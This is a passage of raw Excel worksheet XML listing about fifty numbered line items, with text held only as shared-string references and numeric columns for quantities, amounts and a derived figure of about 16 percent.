      <c r="J787" s="15">
        <v>905.8432</v>
      </c>
      <c r="K787" s="16"/>
    </row>
    <row r="788" spans="2:11">
      <c r="B788" s="9">
        <v>815</v>
      </c>
      <c r="C788" s="238" t="s">
        <v>6727</v>
      </c>
      <c r="D788" s="238" t="s">
        <v>6728</v>
      </c>
      <c r="E788" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F788" s="238" t="s">
        <v>6679</v>
      </c>
      <c r="G788" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H788" s="10">
        <v>1</v>
      </c>
      <c r="I788" s="14">
        <v>1025.64</v>
      </c>
      <c r="J788" s="15">
        <v>164.1024</v>
      </c>
      <c r="K788" s="16"/>
    </row>
    <row r="789" spans="2:11">
      <c r="B789" s="9">
        <v>816</v>
      </c>
      <c r="C789" s="238" t="s">
        <v>6729</v>
      </c>
      <c r="D789" s="238" t="s">
        <v>6730</v>
      </c>
      <c r="E789" s="238" t="s">
        <v>6731</v>
      </c>
      <c r="F789" s="238" t="s">
        <v>6687</v>
      </c>
      <c r="G789" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H789" s="10">
        <v>5</v>
      </c>
      <c r="I789" s="14">
        <v>3542.27</v>
      </c>
      <c r="J789" s="15">
        <v>566.76</v>
      </c>
      <c r="K789" s="16"/>
    </row>
    <row r="790" spans="2:11">
      <c r="B790" s="9">
        <v>817</v>
      </c>
      <c r="C790" s="238" t="s">
        <v>6732</v>
      </c>
      <c r="D790" s="238" t="s">
        <v>6733</v>
      </c>
      <c r="E790" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F790" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G790" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H790" s="10">
        <v>5</v>
      </c>
      <c r="I790" s="14">
        <v>5854.7</v>
      </c>
      <c r="J790" s="15">
        <v>936.752</v>
      </c>
      <c r="K790" s="16"/>
    </row>
    <row r="791" spans="2:11">
      <c r="B791" s="9">
        <v>818</v>
      </c>
      <c r="C791" s="238" t="s">
        <v>6735</v>
      </c>
      <c r="D791" s="238" t="s">
        <v>6736</v>
      </c>
      <c r="E791" s="238" t="s">
        <v>6737</v>
      </c>
      <c r="F791" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G791" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H791" s="10">
        <v>1</v>
      </c>
      <c r="I791" s="14">
        <v>4017.04</v>
      </c>
      <c r="J791" s="15">
        <v>642.7264</v>
      </c>
      <c r="K791" s="16"/>
    </row>
    <row r="792" spans="2:11">
      <c r="B792" s="9">
        <v>819</v>
      </c>
      <c r="C792" s="238" t="s">
        <v>6738</v>
      </c>
      <c r="D792" s="238" t="s">
        <v>6739</v>
      </c>
      <c r="E792" s="238" t="s">
        <v>6740</v>
      </c>
      <c r="F792" s="238" t="s">
        <v>1960</v>
      </c>
      <c r="G792" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H792" s="10">
        <v>4</v>
      </c>
      <c r="I792" s="14">
        <v>7452.99</v>
      </c>
      <c r="J792" s="15">
        <v>1192.48</v>
      </c>
      <c r="K792" s="16"/>
    </row>
    <row r="793" spans="2:11">
      <c r="B793" s="9">
        <v>820</v>
      </c>
      <c r="C793" s="238" t="s">
        <v>6741</v>
      </c>
      <c r="D793" s="238" t="s">
        <v>6742</v>
      </c>
      <c r="E793" s="238" t="s">
        <v>6743</v>
      </c>
      <c r="F793" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G793" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H793" s="10">
        <v>2</v>
      </c>
      <c r="I793" s="14">
        <v>717.95</v>
      </c>
      <c r="J793" s="15">
        <v>114.8736</v>
      </c>
      <c r="K793" s="16"/>
    </row>
    <row r="794" spans="2:11">
      <c r="B794" s="9">
        <v>821</v>
      </c>
      <c r="C794" s="238" t="s">
        <v>6744</v>
      </c>
      <c r="D794" s="238" t="s">
        <v>6745</v>
      </c>
      <c r="E794" s="238" t="s">
        <v>6746</v>
      </c>
      <c r="F794" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G794" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H794" s="10">
        <v>6</v>
      </c>
      <c r="I794" s="14">
        <v>3179.47</v>
      </c>
      <c r="J794" s="15">
        <v>508.7136</v>
      </c>
      <c r="K794" s="16"/>
    </row>
    <row r="795" spans="2:11">
      <c r="B795" s="9">
        <v>822</v>
      </c>
      <c r="C795" s="238" t="s">
        <v>6747</v>
      </c>
      <c r="D795" s="238" t="s">
        <v>6748</v>
      </c>
      <c r="E795" s="238" t="s">
        <v>6746</v>
      </c>
      <c r="F795" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G795" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H795" s="10">
        <v>20</v>
      </c>
      <c r="I795" s="14">
        <v>2222.22</v>
      </c>
      <c r="J795" s="15">
        <v>355.552</v>
      </c>
      <c r="K795" s="16"/>
    </row>
    <row r="796" spans="2:11">
      <c r="B796" s="9">
        <v>823</v>
      </c>
      <c r="C796" s="238" t="s">
        <v>6749</v>
      </c>
      <c r="D796" s="238" t="s">
        <v>6750</v>
      </c>
      <c r="E796" s="238" t="s">
        <v>6751</v>
      </c>
      <c r="F796" s="238" t="s">
        <v>6676</v>
      </c>
      <c r="G796" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H796" s="10">
        <v>27</v>
      </c>
      <c r="I796" s="14">
        <v>1839.39</v>
      </c>
      <c r="J796" s="15">
        <v>294.3216</v>
      </c>
      <c r="K796" s="16"/>
    </row>
    <row r="797" spans="2:11">
      <c r="B797" s="9">
        <v>824</v>
      </c>
      <c r="C797" s="238" t="s">
        <v>6752</v>
      </c>
      <c r="D797" s="238" t="s">
        <v>6753</v>
      </c>
      <c r="E797" s="238" t="s">
        <v>5174</v>
      </c>
      <c r="F797" s="238" t="s">
        <v>6684</v>
      </c>
      <c r="G797" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H797" s="10">
        <v>5</v>
      </c>
      <c r="I797" s="14">
        <v>2478.63</v>
      </c>
      <c r="J797" s="15">
        <v>396.584</v>
      </c>
      <c r="K797" s="16"/>
    </row>
    <row r="798" spans="2:11">
      <c r="B798" s="9">
        <v>825</v>
      </c>
      <c r="C798" s="238" t="s">
        <v>6754</v>
      </c>
      <c r="D798" s="238" t="s">
        <v>6755</v>
      </c>
      <c r="E798" s="238" t="s">
        <v>5174</v>
      </c>
      <c r="F798" s="238" t="s">
        <v>6679</v>
      </c>
      <c r="G798" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H798" s="10">
        <v>4</v>
      </c>
      <c r="I798" s="14">
        <v>2187.95</v>
      </c>
      <c r="J798" s="15">
        <v>350.0736</v>
      </c>
      <c r="K798" s="16"/>
    </row>
    <row r="799" spans="2:11">
      <c r="B799" s="9">
        <v>826</v>
      </c>
      <c r="C799" s="238" t="s">
        <v>6756</v>
      </c>
      <c r="D799" s="238" t="s">
        <v>4947</v>
      </c>
      <c r="E799" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F799" s="238" t="s">
        <v>6757</v>
      </c>
      <c r="G799" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H799" s="10">
        <v>24</v>
      </c>
      <c r="I799" s="14">
        <v>350.05</v>
      </c>
      <c r="J799" s="15">
        <v>56.0256</v>
      </c>
      <c r="K799" s="16"/>
    </row>
    <row r="800" spans="2:11">
      <c r="B800" s="9">
        <v>827</v>
      </c>
      <c r="C800" s="238" t="s">
        <v>6758</v>
      </c>
      <c r="D800" s="238" t="s">
        <v>6759</v>
      </c>
      <c r="E800" s="238" t="s">
        <v>6760</v>
      </c>
      <c r="F800" s="238" t="s">
        <v>708</v>
      </c>
      <c r="G800" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H800" s="10">
        <v>3</v>
      </c>
      <c r="I800" s="14">
        <v>3846.15</v>
      </c>
      <c r="J800" s="15">
        <v>615.384</v>
      </c>
      <c r="K800" s="16"/>
    </row>
    <row r="801" spans="2:11">
      <c r="B801" s="9">
        <v>828</v>
      </c>
      <c r="C801" s="238" t="s">
        <v>6761</v>
      </c>
      <c r="D801" s="238" t="s">
        <v>6762</v>
      </c>
      <c r="E801" s="238" t="s">
        <v>6760</v>
      </c>
      <c r="F801" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G801" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H801" s="10">
        <v>1</v>
      </c>
      <c r="I801" s="14">
        <v>1538.46</v>
      </c>
      <c r="J801" s="15">
        <v>246.1536</v>
      </c>
      <c r="K801" s="16"/>
    </row>
    <row r="802" spans="2:11">
      <c r="B802" s="9">
        <v>829</v>
      </c>
      <c r="C802" s="238" t="s">
        <v>6763</v>
      </c>
      <c r="D802" s="238" t="s">
        <v>6764</v>
      </c>
      <c r="E802" s="238" t="s">
        <v>6765</v>
      </c>
      <c r="F802" s="238" t="s">
        <v>6766</v>
      </c>
      <c r="G802" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H802" s="10">
        <v>21</v>
      </c>
      <c r="I802" s="14">
        <v>2100.12</v>
      </c>
      <c r="J802" s="15">
        <v>336.0336</v>
      </c>
      <c r="K802" s="16"/>
    </row>
    <row r="803" spans="2:11">
      <c r="B803" s="9">
        <v>830</v>
      </c>
      <c r="C803" s="238" t="s">
        <v>6767</v>
      </c>
      <c r="D803" s="238" t="s">
        <v>6768</v>
      </c>
      <c r="E803" s="238" t="s">
        <v>6769</v>
      </c>
      <c r="F803" s="238" t="s">
        <v>3184</v>
      </c>
      <c r="G803" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H803" s="10">
        <v>7</v>
      </c>
      <c r="I803" s="14">
        <v>2752.14</v>
      </c>
      <c r="J803" s="15">
        <v>440.3392</v>
      </c>
      <c r="K803" s="16"/>
    </row>
    <row r="804" spans="2:11">
      <c r="B804" s="9">
        <v>831</v>
      </c>
      <c r="C804" s="238" t="s">
        <v>6770</v>
      </c>
      <c r="D804" s="238" t="s">
        <v>6771</v>
      </c>
      <c r="E804" s="238" t="s">
        <v>6772</v>
      </c>
      <c r="F804" s="238" t="s">
        <v>6773</v>
      </c>
      <c r="G804" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H804" s="10">
        <v>11</v>
      </c>
      <c r="I804" s="14">
        <v>473.22</v>
      </c>
      <c r="J804" s="15">
        <v>75.7152</v>
      </c>
      <c r="K804" s="16"/>
    </row>
    <row r="805" spans="2:11">
      <c r="B805" s="9">
        <v>832</v>
      </c>
      <c r="C805" s="238" t="s">
        <v>6774</v>
      </c>
      <c r="D805" s="238" t="s">
        <v>6771</v>
      </c>
      <c r="E805" s="238" t="s">
        <v>6775</v>
      </c>
      <c r="F805" s="238" t="s">
        <v>6776</v>
      </c>
      <c r="G805" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H805" s="10">
        <v>7</v>
      </c>
      <c r="I805" s="14">
        <v>89.75</v>
      </c>
      <c r="J805" s="15">
        <v>14.3584</v>
      </c>
      <c r="K805" s="16"/>
    </row>
    <row r="806" spans="2:11">
      <c r="B806" s="9">
        <v>833</v>
      </c>
      <c r="C806" s="238" t="s">
        <v>6777</v>
      </c>
      <c r="D806" s="238" t="s">
        <v>6778</v>
      </c>
      <c r="E806" s="238" t="s">
        <v>6779</v>
      </c>
      <c r="F806" s="9"/>
      <c r="G806" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H806" s="10">
        <v>42</v>
      </c>
      <c r="I806" s="14">
        <v>641.1</v>
      </c>
      <c r="J806" s="15">
        <v>102.5472</v>
      </c>
      <c r="K806" s="16"/>
    </row>
    <row r="807" spans="2:11">
      <c r="B807" s="9">
        <v>834</v>
      </c>
      <c r="C807" s="238" t="s">
        <v>6780</v>
      </c>
      <c r="D807" s="238" t="s">
        <v>6781</v>
      </c>
      <c r="E807" s="238" t="s">
        <v>6782</v>
      </c>
      <c r="F807" s="9"/>
      <c r="G807" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H807" s="10">
        <v>5</v>
      </c>
      <c r="I807" s="14">
        <v>6.3</v>
      </c>
      <c r="J807" s="15">
        <v>1.008</v>
      </c>
      <c r="K807" s="16"/>
    </row>
    <row r="808" spans="2:11">
      <c r="B808" s="9">
        <v>835</v>
      </c>
      <c r="C808" s="238" t="s">
        <v>6783</v>
      </c>
      <c r="D808" s="238" t="s">
        <v>6784</v>
      </c>
      <c r="E808" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F808" s="238" t="s">
        <v>6510</v>
      </c>
      <c r="G808" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H808" s="10">
        <v>9</v>
      </c>
      <c r="I808" s="14">
        <v>36.43</v>
      </c>
      <c r="J808" s="15">
        <v>5.832</v>
      </c>
      <c r="K808" s="16"/>
    </row>
    <row r="809" spans="2:11">
      <c r="B809" s="9">
        <v>836</v>
      </c>
      <c r="C809" s="238" t="s">
        <v>6785</v>
      </c>
      <c r="D809" s="238" t="s">
        <v>6786</v>
      </c>
      <c r="E809" s="238" t="s">
        <v>6392</v>
      </c>
      <c r="F809" s="238" t="s">
        <v>6787</v>
      </c>
      <c r="G809" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H809" s="10">
        <v>2</v>
      </c>
      <c r="I809" s="14">
        <v>8.55</v>
      </c>
      <c r="J809" s="15">
        <v>1.3696</v>
      </c>
      <c r="K809" s="16"/>
    </row>
    <row r="810" spans="2:11">
      <c r="B810" s="9">
        <v>837</v>
      </c>
      <c r="C810" s="238" t="s">
        <v>6788</v>
      </c>
      <c r="D810" s="238" t="s">
        <v>4765</v>
      </c>
      <c r="E810" s="238" t="s">
        <v>6789</v>
      </c>
      <c r="F810" s="238" t="s">
        <v>6305</v>
      </c>
      <c r="G810" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H810" s="10">
        <v>6</v>
      </c>
      <c r="I810" s="14">
        <v>20.51</v>
      </c>
      <c r="J810" s="15">
        <v>3.2832</v>
      </c>
      <c r="K810" s="16"/>
    </row>
    <row r="811" spans="2:11">
      <c r="B811" s="9">
        <v>838</v>
      </c>
      <c r="C811" s="238" t="s">
        <v>6790</v>
      </c>
      <c r="D811" s="238" t="s">
        <v>6385</v>
      </c>
      <c r="E811" s="238" t="s">
        <v>6789</v>
      </c>
      <c r="F811" s="238" t="s">
        <v>6548</v>
      </c>
      <c r="G811" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H811" s="10">
        <v>6</v>
      </c>
      <c r="I811" s="14">
        <v>19.49</v>
      </c>
      <c r="J811" s="15">
        <v>3.12</v>
      </c>
      <c r="K811" s="16"/>
    </row>
    <row r="812" spans="2:11">
      <c r="B812" s="9">
        <v>839</v>
      </c>
      <c r="C812" s="238" t="s">
        <v>6791</v>
      </c>
      <c r="D812" s="238" t="s">
        <v>6792</v>
      </c>
      <c r="E812" s="238" t="s">
        <v>6793</v>
      </c>
      <c r="F812" s="238" t="s">
        <v>6510</v>
      </c>
      <c r="G812" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H812" s="10">
        <v>3</v>
      </c>
      <c r="I812" s="14">
        <v>40.91</v>
      </c>
      <c r="J812" s="15">
        <v>6.5472</v>
      </c>
      <c r="K812" s="16"/>
    </row>
    <row r="813" spans="2:11">
      <c r="B813" s="9">
        <v>840</v>
      </c>
      <c r="C813" s="238" t="s">
        <v>6794</v>
      </c>
      <c r="D813" s="238" t="s">
        <v>6795</v>
      </c>
      <c r="E813" s="238" t="s">
        <v>6796</v>
      </c>
      <c r="F813" s="9"/>
      <c r="G813" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H813" s="10">
        <v>9</v>
      </c>
      <c r="I813" s="14">
        <v>511.97</v>
      </c>
      <c r="J813" s="15">
        <v>81.9216</v>
      </c>
      <c r="K813" s="16"/>
    </row>
    <row r="814" spans="2:11">
      <c r="B814" s="9">
        <v>841</v>
      </c>
      <c r="C814" s="238" t="s">
        <v>6797</v>
      </c>
      <c r="D814" s="238" t="s">
        <v>6798</v>
      </c>
      <c r="E814" s="238" t="s">
        <v>6799</v>
      </c>
      <c r="F814" s="9"/>
      <c r="G814" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H814" s="10">
        <v>10</v>
      </c>
      <c r="I814" s="14">
        <v>154.16</v>
      </c>
      <c r="J814" s="15">
        <v>24.672</v>
      </c>
      <c r="K814" s="16"/>
    </row>
    <row r="815" spans="2:11">
      <c r="B815" s="9">
        <v>842</v>
      </c>
      <c r="C815" s="238" t="s">
        <v>6800</v>
      </c>
      <c r="D815" s="238" t="s">
        <v>6801</v>
      </c>
      <c r="E815" s="238" t="s">
        <v>6802</v>
      </c>
      <c r="F815" s="9"/>
      <c r="G815" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H815" s="10">
        <v>49</v>
      </c>
      <c r="I815" s="14">
        <v>207.52</v>
      </c>
      <c r="J815" s="15">
        <v>33.2416</v>
      </c>
      <c r="K815" s="16"/>
    </row>
    <row r="816" spans="2:11">
      <c r="B816" s="9">
        <v>843</v>
      </c>
      <c r="C816" s="238" t="s">
        <v>6803</v>
      </c>
      <c r="D816" s="238" t="s">
        <v>6578</v>
      </c>
      <c r="E816" s="238" t="s">
        <v>6796</v>
      </c>
      <c r="F816" s="238" t="s">
        <v>6349</v>
      </c>
      <c r="G816" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H816" s="10">
        <v>1</v>
      </c>
      <c r="I816" s="14">
        <v>8.1</v>
      </c>
      <c r="J816" s="15">
        <v>1.296</v>
      </c>
      <c r="K816" s="16"/>
    </row>
    <row r="817" spans="2:11">
      <c r="B817" s="9">
        <v>844</v>
      </c>
      <c r="C817" s="238" t="s">
        <v>6804</v>
      </c>
      <c r="D817" s="238" t="s">
        <v>6805</v>
      </c>
      <c r="E817" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F817" s="9"/>
      <c r="G817" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H817" s="10">
        <v>6</v>
      </c>
      <c r="I817" s="14">
        <v>1279.93</v>
      </c>
      <c r="J817" s="15">
        <v>204.7872</v>
      </c>
      <c r="K817" s="16"/>
    </row>
    <row r="818" spans="2:11">
      <c r="B818" s="9">
        <v>845</v>
      </c>
      <c r="C818" s="238" t="s">
        <v>6806</v>
      </c>
      <c r="D818" s="238" t="s">
        <v>6805</v>
      </c>
      <c r="E818" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F818" s="238" t="s">
        <v>6807</v>
      </c>
      <c r="G818" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H818" s="10">
        <v>2</v>
      </c>
      <c r="I818" s="14">
        <v>1025.64</v>
      </c>
      <c r="J818" s="15">
        <v>164.1024</v>
      </c>
      <c r="K818" s="16"/>
    </row>
    <row r="819" spans="2:11">
      <c r="B819" s="9">
        <v>846</v>
      </c>
      <c r="C819" s="238" t="s">
        <v>6808</v>
      </c>
      <c r="D819" s="238" t="s">
        <v>6809</v>
      </c>
      <c r="E819" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F819" s="238" t="s">
        <v>2181</v>
      </c>
      <c r="G819" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H819" s="10">
        <v>20</v>
      </c>
      <c r="I819" s="14">
        <v>463.94</v>
      </c>
      <c r="J819" s="15">
        <v>74.24</v>
      </c>
      <c r="K819" s="16"/>
    </row>
    <row r="820" spans="2:11">
      <c r="B820" s="9">
        <v>847</v>
      </c>
      <c r="C820" s="238" t="s">
        <v>6811</v>
      </c>
      <c r="D820" s="238" t="s">
        <v>6812</v>
      </c>
      <c r="E820" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F820" s="238" t="s">
        <v>6813</v>
      </c>
      <c r="G820" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H820" s="10">
        <v>3</v>
      </c>
      <c r="I820" s="14">
        <v>237.69</v>
      </c>
      <c r="J820" s="15">
        <v>38.0304</v>
      </c>
      <c r="K820" s="16"/>
    </row>
    <row r="821" spans="2:11">
      <c r="B821" s="9">
        <v>848</v>
      </c>
      <c r="C821" s="238" t="s">
        <v>6814</v>
      </c>
      <c r="D821" s="238" t="s">
        <v>6815</v>
      </c>
      <c r="E821" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F821" s="238" t="s">
        <v>6564</v>
      </c>
      <c r="G821" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H821" s="10">
        <v>9</v>
      </c>
      <c r="I821" s="14">
        <v>1639.84</v>
      </c>
      <c r="J821" s="15">
        <v>262.368</v>
      </c>
      <c r="K821" s="16"/>
    </row>
    <row r="822" spans="2:11">
      <c r="B822" s="9">
        <v>849</v>
      </c>
      <c r="C822" s="238" t="s">
        <v>6816</v>
      </c>
      <c r="D822" s="238" t="s">
        <v>6817</v>
      </c>
      <c r="E822" s="238" t="s">
        <v>6192</v>
      </c>
      <c r="F822" s="238" t="s">
        <v>6818</v>
      </c>
      <c r="G822" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H822" s="10">
        <v>4</v>
      </c>
      <c r="I822" s="14">
        <v>1333.34</v>
      </c>
      <c r="J822" s="15">
        <v>213.3376</v>
      </c>
      <c r="K822" s="16"/>
    </row>
    <row r="823" spans="2:11">
      <c r="B823" s="9">
        <v>850</v>
      </c>
      <c r="C823" s="238" t="s">
        <v>6819</v>
      </c>
      <c r="D823" s="238" t="s">
        <v>4718</v>
      </c>
      <c r="E823" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F823" s="238" t="s">
        <v>6820</v>
      </c>
      <c r="G823" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H823" s="10">
        <v>20</v>
      </c>
      <c r="I823" s="14">
        <v>76.05</v>
      </c>
      <c r="J823" s="15">
        <v>12.16</v>
      </c>
      <c r="K823" s="16"/>
    </row>
    <row r="824" spans="2:11">
      <c r="B824" s="9">
        <v>851</v>
      </c>
      <c r="C824" s="238" t="s">
        <v>6821</v>
      </c>
      <c r="D824" s="238" t="s">
        <v>4718</v>
      </c>
      <c r="E824" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F824" s="238" t="s">
        <v>6822</v>
      </c>
      <c r="G824" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H824" s="10">
        <v>19</v>
      </c>
      <c r="I824" s="14">
        <v>154.45</v>
      </c>
      <c r="J824" s="15">
        <v>24.7152</v>
      </c>
      <c r="K824" s="16"/>
    </row>
    <row r="825" spans="2:11">
      <c r="B825" s="9">
        <v>852</v>
      </c>
      <c r="C825" s="238" t="s">
        <v>6823</v>
      </c>
      <c r="D825" s="238" t="s">
        <v>6824</v>
      </c>
      <c r="E825" s="238" t="s">
        <v>6825</v>
      </c>
      <c r="F825" s="238" t="s">
        <v>6826</v>
      </c>
      <c r="G825" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H825" s="10">
        <v>16</v>
      </c>
      <c r="I825" s="14">
        <v>2324.8</v>
      </c>
      <c r="J825" s="15">
        <v>371.968</v>
      </c>
      <c r="K825" s="16"/>
    </row>
    <row r="826" spans="2:11">
      <c r="B826" s="9">
        <v>853</v>
      </c>
      <c r="C826" s="238" t="s">
        <v>6827</v>
      </c>
      <c r="D826" s="238" t="s">
        <v>6828</v>
      </c>
      <c r="E826" s="238" t="s">
        <v>6829</v>
      </c>
      <c r="F826" s="238" t="s">
        <v>6830</v>
      </c>
      <c r="G826" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H826" s="10">
        <v>1</v>
      </c>
      <c r="I826" s="14">
        <v>101.15</v>
      </c>
      <c r="J826" s="15">
        <v>16.184</v>
      </c>
      <c r="K826" s="16"/>
    </row>
    <row r="827" spans="2:11">
      <c r="B827" s="9">
        <v>854</v>
      </c>
      <c r="C827" s="238" t="s">
        <v>6831</v>
      </c>
      <c r="D827" s="9"/>
      <c r="E827" s="238" t="s">
        <v>6829</v>
      </c>
      <c r="F827" s="238" t="s">
        <v>6830</v>
      </c>
      <c r="G827" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H827" s="10">
        <v>1</v>
      </c>
      <c r="I827" s="14">
        <v>66.67</v>
      </c>
      <c r="J827" s="15">
        <v>10.6672</v>
      </c>
      <c r="K827" s="16"/>
    </row>
    <row r="828" spans="2:11">
      <c r="B828" s="9">
        <v>855</v>
      </c>
      <c r="C828" s="238" t="s">
        <v>6832</v>
      </c>
      <c r="D828" s="238" t="s">
        <v>6833</v>
      </c>
      <c r="E828" s="238" t="s">
        <v>6834</v>
      </c>
      <c r="F828" s="238" t="s">
        <v>6835</v>
      </c>
      <c r="G828" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H828" s="10">
        <v>18</v>
      </c>
      <c r="I828" s="14">
        <v>230.89</v>
      </c>
      <c r="J828" s="15">
        <v>36.9504</v>
      </c>
      <c r="K828" s="16"/>
    </row>
    <row r="829" spans="2:11">
      <c r="B829" s="9">
        <v>856</v>
      </c>
      <c r="C829" s="238" t="s">
        <v>6836</v>
      </c>
      <c r="D829" s="238" t="s">
        <v>6837</v>
      </c>
      <c r="E829" s="238" t="s">
        <v>6838</v>
      </c>
      <c r="F829" s="238" t="s">
        <v>6839</v>
      </c>
      <c r="G829" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H829" s="10">
        <v>260</v>
      </c>
      <c r="I829" s="14">
        <v>2445.91</v>
      </c>
      <c r="J829" s="15">
        <v>391.456</v>
      </c>
      <c r="K829" s="16"/>
    </row>
    <row r="830" spans="2:11">
      <c r="B830" s="9">
        <v>857</v>
      </c>
      <c r="C830" s="238" t="s">
        <v>6840</v>
      </c>
      <c r="D830" s="238" t="s">
        <v>6834</v>
      </c>
      <c r="E830" s="238" t="s">
        <v>6834</v>
      </c>
      <c r="F830" s="238" t="s">
        <v>6841</v>
      </c>
      <c r="G830" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H830" s="10">
        <v>18</v>
      </c>
      <c r="I830" s="14">
        <v>230.83</v>
      </c>
      <c r="J830" s="15">
        <v>36.9216</v>
      </c>
      <c r="K830" s="16"/>
    </row>
    <row r="831" spans="2:11">
      <c r="B831" s="9">
        <v>858</v>
      </c>
      <c r="C831" s="238" t="s">
        <v>6842</v>
      </c>
      <c r="D831" s="238" t="s">
        <v>6843</v>
      </c>
      <c r="E831" s="238" t="s">
        <v>6844</v>
      </c>
      <c r="F831" s="9"/>
      <c r="G831" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H831" s="10">
        <v>40</v>
      </c>
      <c r="I831" s="14">
        <v>212.23</v>
      </c>
      <c r="J831" s="15">
        <v>33.984</v>
      </c>
      <c r="K831" s="16"/>
    </row>
    <row r="832" spans="2:11">
      <c r="B832" s="9">
        <v>859</v>
      </c>
      <c r="C832" s="238" t="s">
        <v>6845</v>
      </c>
      <c r="D832" s="238" t="s">
        <v>6846</v>
      </c>
      <c r="E832" s="238" t="s">
        <v>6847</v>
      </c>
      <c r="F832" s="238" t="s">
        <v>6848</v>
      </c>
      <c r="G832" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H832" s="10">
        <v>12</v>
      </c>
      <c r="I832" s="14">
        <v>188.03</v>
      </c>
      <c r="J832" s="15">
        <v>30.0864</v>
      </c>
      <c r="K832" s="16"/>
    </row>
    <row r="833" spans="2:11">
      <c r="B833" s="9">
        <v>860</v>
      </c>
      <c r="C833" s="238" t="s">
        <v>6849</v>
      </c>
      <c r="D833" s="238" t="s">
        <v>6850</v>
      </c>
      <c r="E833" s="238" t="s">
        <v>6851</v>
      </c>
      <c r="F833" s="9"/>
      <c r="G833" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H833" s="10">
        <v>50</v>
      </c>
      <c r="I833" s="14">
        <v>363.25</v>
      </c>
      <c r="J833" s="15">
        <v>58.16</v>
      </c>
      <c r="K833" s="16"/>
    </row>
    <row r="834" spans="2:11">
      <c r="B834" s="9">
        <v>861</v>
      </c>
      <c r="C834" s="238" t="s">
        <v>6852</v>
      </c>
      <c r="D834" s="238" t="s">
        <v>6853</v>
      </c>
      <c r="E834" s="238" t="s">
        <v>6854</v>
      </c>
      <c r="F834" s="9"/>
      <c r="G834" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H834" s="10">
        <v>1050</v>
      </c>
      <c r="I834" s="17"/>
      <c r="J834" s="15">
        <v>0</v>
      </c>
      <c r="K834" s="16"/>
    </row>
    <row r="835" spans="2:11">
      <c r="B835" s="9">
        <v>862</v>
      </c>
      <c r="C835" s="238" t="s">
        <v>6855</v>
      </c>
      <c r="D835" s="238" t="s">
        <v>6856</v>
      </c>
      <c r="E835" s="238" t="s">
        <v>6857</v>
      </c>
      <c r="F835" s="9"/>
      <c r="G835" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H835" s="10">
        <v>404</v>
      </c>
      <c r="I835" s="14">
        <v>1836.33</v>
      </c>
      <c r="J835" s="15">
        <v>294.112</v>
      </c>
      <c r="K835" s="16"/>
    </row>
    <row r="836" spans="2:11">
      <c r="B836" s="9">
        <v>863</v>
      </c>
      <c r="C836" s="238" t="s">
        <v>6858</v>
      </c>
      <c r="D836" s="238" t="s">
        <v>6859</v>
      </c>
      <c r="E836" s="238" t="s">
        <v>6860</v>
      </c>
      <c r="F836" s="9"/>
      <c r="G836" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H836" s="10">
        <v>350</v>
      </c>
      <c r="I836" s="14">
        <v>9993.94</v>
      </c>
      <c r="J836" s="15">
        <v>1598.8</v>
      </c>
      <c r="K836" s="16"/>
    </row>
    <row r="837" spans="2:11">
      <c r="B837" s="9">
        <v>864</v>
      </c>
      <c r="C837" s="238" t="s">
        <v>6861</v>
      </c>
      <c r="D837" s="238" t="s">
        <v>6862</v>
      </c>
